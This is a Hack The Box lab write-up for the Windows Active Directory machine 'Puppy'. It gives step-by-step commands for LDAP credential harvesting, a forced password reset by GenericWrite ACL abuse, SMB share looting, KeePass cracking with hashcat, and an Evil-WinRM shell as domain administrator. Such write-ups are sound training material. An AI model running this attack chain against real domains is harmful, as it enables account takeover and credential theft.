Puppy — 0xnrg.se

Hack The Box · Lab

MediumWindowsActive Directory

IP: 10.10.11.70 | Domain: puppy.htb | DC: dc.puppy.htb

Environment Setup

export IP=10.10.11.70
export VPN=$(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1)
echo "10.10.11.70 puppy.htb dc.puppy.htb" >> /etc/hosts

Step 1 — Port Scanning

Why: Identify open services. On a Windows box, Kerberos (88), LDAP (389), and SMB (445) together confirm a Domain Controller immediately. WinRM (5985) being open means valid credentials equal a shell — no need for MSF or complex lateral movement.

nmap -sCV -p- --min-rate 5000 $IP -oN nmap.out

Output:

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Key findings:

Confirmed Domain Controller — full AD port set
WinRM (5985) open — any domain creds with remote access rights = shell
No HTTP — pure AD attack surface

Step 2 — LDAP User Enumeration

Why: Anonymous or authenticated LDAP allows full enumeration of user objects and their attributes. Password fields in description attributes are a pervasive misconfiguration in corporate AD environments — admins set a temporary password via the description field and forget to remove it.

ldapsearch -x -H ldap://$IP -b "DC=puppy,DC=htb" "(objectClass=user)" sAMAccountName description

Output:

sAMAccountName: levi.james
description: <REDACTED>

Key findings:

Valid credential found in description field: levi.james:<REDACTED>
Password-in-description is a classic AD misconfiguration — often leftover from account provisioning

Step 3 — BloodHound Enumeration

Why: With valid credentials, BloodHound maps every ACL, group membership, and attack path in the domain. GenericWrite over a user means you can set their scriptPath or abuse the attribute to force a password reset — a common path to privilege escalation from a low-privileged account.

bloodhound-python -u levi.james -p '<REDACTED>' -ns $IP -d puppy.htb -c all

Key findings:

levi.james has GenericWrite over ant.edwards
ant.edwards is a member of the HR group with access to sensitive shares
Path: levi.james → GenericWrite → ant.edwards → HR share

Step 4 — ACL Abuse — GenericWrite → Force Password Change

Why: GenericWrite on a user object allows setting writable attributes including scriptPath. However, the most impactful abuse is forcing a password change via Set-DomainUserPassword (PowerView) or Impacket, giving immediate control of the target account without knowing their current password.

net rpc password ant.edwards '<REDACTED>' -U puppy.htb/levi.james%'<REDACTED>' -S $IP

Output:

# Successful — no error returned

Key findings:

Password for ant.edwards reset without knowledge of current password
GenericWrite → password reset = instant account takeover

Step 5 — SMB Enumeration as ant.edwards

Why: HR group membership typically maps directly to accessible shares. Internal HR shares are high-value targets — they frequently contain sensitive documents, employee data, and credential files (KeePass, Excel sheets, password-protected archives).

nxc smb $IP -u ant.edwards -p '<REDACTED>' --shares
smbclient //$IP/HR -U "puppy.htb/ant.edwards%<REDACTED>" -c "recurse ON; prompt OFF; mget *"

Output:

Share        Permissions
-----        -----------
HR           READ,WRITE
NETLOGON     READ
SYSVOL       READ

Key findings:

HR share accessible — found KeePass.kdbx (KeePass database)
KeePass databases are encrypted but the master password may be crackable

Step 6 — KeePass Master Password Crack

Why: KeePass .kdbx files are protected by a master password, but the PBKDF2/AES encryption can be attacked offline with hashcat. Weak or dictionary-derived master passwords crack quickly against rockyou.

keepass2john KeePass.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt

Output:

KeePass.kdbx:<REDACTED>

Key findings:

Master password cracked — database unlocked
Contains Administrator credentials for the domain

Step 7 — Domain Admin

Why: With Administrator's plaintext password recovered from KeePass, WinRM gives a direct shell on the DC.

evil-winrm -i $IP -u Administrator -p '<REDACTED>'

Output:

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
puppy\administrator

🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED

Credentials

levi.james:<REDACTED>      # LDAP description field
ant.edwards:<REDACTED>     # Force password reset (GenericWrite)
Administrator:<REDACTED>   # KeePass database

Full Attack Chain

LDAP user enum → description field → levi.james:<REDACTED>
  └─ BloodHound → GenericWrite on ant.edwards
        └─ Force password reset → ant.edwards:<REDACTED>
              └─ SMB HR share (READ) → KeePass.kdbx
                    └─ hashcat (rockyou) → master password cracked
                          └─ KeePass → Administrator:<REDACTED>
                                └─ Evil-WinRM → SYSTEM on DC
                                      🏴 DOMAIN ADMIN